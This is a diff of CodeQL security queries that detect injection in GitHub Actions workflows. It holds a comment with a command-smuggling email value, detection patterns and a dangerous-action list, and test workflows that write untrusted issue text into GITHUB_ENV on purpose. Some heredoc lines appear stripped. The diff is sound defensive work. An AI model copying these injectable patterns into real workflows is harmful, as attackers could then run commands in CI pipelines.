predicate emailEvent(string context) { - exists(string reg | - reg = - [ - // email - // `echo${IFS}hello`@domain.com - "github\\.event\\.head_commit\\.author\\.email", - "github\\.event\\.head_commit\\.committer\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", - "github\\.event\\.merge_group\\.committer\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string usernameEvent() { + // All characters must be either a hyphen (-) or alphanumeric + result = + [ + "github\\.event\\.head_commit\\.author\\.name", + "github\\.event\\.head_commit\\.committer\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + "github\\.event\\.merge_group\\.committer\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", + ] } -bindingset[context] -private predicate usernameEvent(string context) { - exists(string reg | - reg = - [ - // username - // All characters must be either a hyphen (-) or alphanumeric - "github\\.event\\.head_commit\\.author\\.name", - "github\\.event\\.head_commit\\.committer\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", - "github\\.event\\.merge_group\\.committer\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string pathEvent() { + result = + [ + "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", + "github\\.event\\.workflow_run\\.referenced_workflows\\.path", + ] } -bindingset[context] -private predicate pathEvent(string context) { - exists(string reg | - reg = - [ - // filename - "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", - "github\\.event\\.workflow_run\\.referenced_workflows\\.path", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string jsonEvent() { + result = + [ + "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", + "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", + "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", + "github\\.event\\.issue", "github\\.event\\.merge_group", + "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", + "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", + "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", + "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.head_commit", + "github\\.event\\.workflow_run\\.head_commit\\.author", + "github\\.event\\.workflow_run\\.head_commit\\.committer", + "github\\.event\\.workflow_run\\.head_repository", + "github\\.event\\.workflow_run\\.pull_requests", + ] + or + result = titleEvent() + or + result = urlEvent() + or + result = textEvent() + or + result = branchEvent() + or + result = labelEvent() + or + result = emailEvent() + or + result = usernameEvent() + or + result = pathEvent() } -bindingset[context] -private predicate jsonEvent(string context) { - exists(string reg | - reg = - [ - // json - "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", - "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", - "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", - "github\\.event\\.issue", "github\\.event\\.merge_group", - "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", - "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", - "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", - "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_commit", - "github\\.event\\.workflow_run\\.head_commit\\.author", - "github\\.event\\.workflow_run\\.head_commit\\.committer", - "github\\.event\\.workflow_run\\.head_repository", - "github\\.event\\.workflow_run\\.pull_requests", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) -} - -class GitHubSource extends RemoteFlowSource { +class GitHubCtxSource extends RemoteFlowSource { string flag; - GitHubSource() { + GitHubCtxSource() { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and @@ -212,14 +166,15 @@ class GitHubSource extends RemoteFlowSource { override string getSourceType() { result = flag } } -class GitHubEventSource extends RemoteFlowSource { +class GitHubEventCtxSource extends RemoteFlowSource { string flag; - GitHubEventSource() { - exists(Expression e, string context | + GitHubEventCtxSource() { + exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and ( + // the context is available for the job trigger events exists(string context_prefix | contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and @@ -227,23 +182,25 @@ class GitHubEventSource extends RemoteFlowSource { ) or exists(e.getEnclosingCompositeAction()) - ) - | - titleEvent(context) and flag = "title" - or - urlEvent(context) and flag = "url" - or - textEvent(context) and flag = "text" - or - branchEvent(context) and flag = "branch" - or - labelEvent(context) and flag = "label" - or - emailEvent(context) and flag = "email" - or - usernameEvent(context) and flag = "username" - or - pathEvent(context) and flag = "filename" + ) and + ( + regexp = titleEvent() and flag = "title" + or + regexp = urlEvent() and flag = "url" + or + regexp = textEvent() and flag = "text" + or + regexp = branchEvent() and flag = "branch" + or + regexp = labelEvent() and flag = "label" + or + regexp = emailEvent() and flag = "email" + or + regexp = usernameEvent() and flag = "username" + or + regexp = pathEvent() and flag = "filename" + ) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapRegexp(regexp) + ".*") ) } @@ -258,17 +215,18 @@ class GitHubEventJsonSource extends RemoteFlowSource { this.asExpr() = e and context = e.getExpression() and ( - jsonEvent(context) and - ( - exists(string context_prefix | - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), - context_prefix) and - normalizeExpr(context).matches("%" + context_prefix + "%") - ) - or - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and - normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") - ) + // only contexts for the triggering events are considered tainted. + // eg: for `pull_request`, we only consider `github.event.pull_request` + exists(string context_prefix | + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), + context_prefix) and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(jsonEvent()) + ".*") + or + // github.event is taintes for all triggers + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp("\\bgithub.event\\b") + ".*") ) and flag = "json" ) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index bbc40d56e2b4..4f4d80cc11bb 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -32,15 +32,20 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> $GITHUB_ENV */ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Run run, string varName, string value | - run.getInScopeEnvVarExpr(varName) = pred.asExpr() and + exists(Run run, string var_name, string content, string value | + run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and + succ.asExpr() = run.getScriptScalar() + | ( - writeToGitHubEnv(run, _, value) or - writeToGitHubOutput(run, _, value) or - writeToGitHubPath(run, value) + writeToGitHubEnv(run, content) or + writeToGitHubOutput(run, content) ) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and - succ.asExpr() = run.getScriptScalar() + extractVariableAndValue(content, _, value) and + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + writeToGitHubPath(run, content) and + value = content and + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") ) } @@ -55,25 +60,28 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * echo "::set-output name=foo::$BODY" * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" + * echo "::set-output name=step-output::$BODY" */ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string key, string value | + exists(Run run, string var_name, string content, string key, string value | + writeToGitHubOutput(run, content) and + extractVariableAndValue(content, key, value) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and succ.asExpr() = run and - writeToGitHubOutput(run, key, value) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") ) } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string key, string value | + exists(Run run, string var_name, string content, string key, string value | + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, key, value) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - writeToGitHubEnv(run, key, value) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") + isBashParameterExpansion(value, var_name, _, _) ) } @@ -83,25 +91,27 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * - run: echo "::set-output name=id::$( 0 + value.matches("$(echo %") and value.indexOf(var_name) > 0 ) ) } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 12919004c039..ead69480d8a5 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -9,21 +9,23 @@ abstract class EnvVarInjectionSink extends DataFlow::Node { } class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { - exists(Run run, Expression expr, string varname, string key, string value | - expr = run.getInScopeEnvVarExpr(varname) and - writeToGitHubEnv(run, key, value) and + exists(Run run, Expression expr, string var_name, string content, string value | + expr = run.getInScopeEnvVarExpr(var_name) and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and run.getScriptScalar() = this.asExpr() and - value.matches("%$" + ["", "{", "ENV{"] + varname + "%") + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") ) } } class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string value | + exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubEnv(run, _, value) and + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and // TODO: add support for other commands like `<`, `jq`, ... value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 646dc35d1f4e..3349b5b11215 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -5,7 +5,10 @@ abstract class PoisonableStep extends Step { } // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 private string dangerousActions() { result = - ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby", "actions/jekyll-build-pages"] + [ + "pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", + "ruby/setup-ruby", "actions/jekyll-build-pages" + ] } class DangerousActionUsesStep extends PoisonableStep, UsesStep { @@ -70,14 +73,14 @@ class LocalActionUsesStep extends PoisonableStep, UsesStep { class EnvVarInjectionRunStep extends PoisonableStep, Run { EnvVarInjectionRunStep() { - exists(string value | + exists(string content, string value | // Heuristic: // Run step with env var definition based on file content. // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` // eg: `echo "sha=$(> $GITHUB_ENV` - writeToGitHubEnv(this, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"]) + writeToGitHubEnv(this, content) and + extractVariableAndValue(content, _, value) and + value.matches("%" + ["ls ", "cat ", "jq ", "$(<"] + "%") ) } } diff --git a/ql/test/library-tests/.github/workflows/multiline.yml b/ql/test/library-tests/.github/workflows/multiline.yml index a112d4ee0f40..dafcd56bba91 100644 --- a/ql/test/library-tests/.github/workflows/multiline.yml +++ b/ql/test/library-tests/.github/workflows/multiline.yml @@ -31,3 +31,59 @@ jobs: cat <<-"EOF" > event.json ${{ toJson(github.event) }} EOF + - name: heredoc11 + run: | + cat >> $GITHUB_ENV << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc12 + run: | + cat > issue.txt << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc21 + run: | + cat << EOL >> $GITHUB_ENV + ${ISSUE_BODY} + FOO + EOL + - name: heredoc22 + run: | + cat < file.txt + Hello + World + EOF + - name: heredoc23 + run: | + cat <<-EOF >> "$GITHUB_ENV" + echo "FOO=$TITLE" + EOF + - name: line1 + run: | + echo REPO_NAME=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV + - name: multiline1 + run: | + echo "PR_TITLE<> $GITHUB_ENV + echo "$TITLE" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV + - name: block11 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - name: block12 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - name: block13 + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 20db431fc24e..18f72de36d11 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -4,18 +4,18 @@ files | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -30,7 +30,17 @@ steps | .github/workflows/multiline.yml:15:9:20:6 | Run Step | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -48,7 +58,17 @@ runSteps | .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -64,7 +84,7 @@ runExprs | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | @@ -89,7 +109,27 @@ runStepChildren | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:15:63:19 | line1 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:15:71:21 | block11 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:15:78:21 | block12 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | @@ -141,37 +181,107 @@ parentNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | | .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:2:14 | workflow_run | | .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:2:3:5:18 | workflow_run: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:15:14:19:40 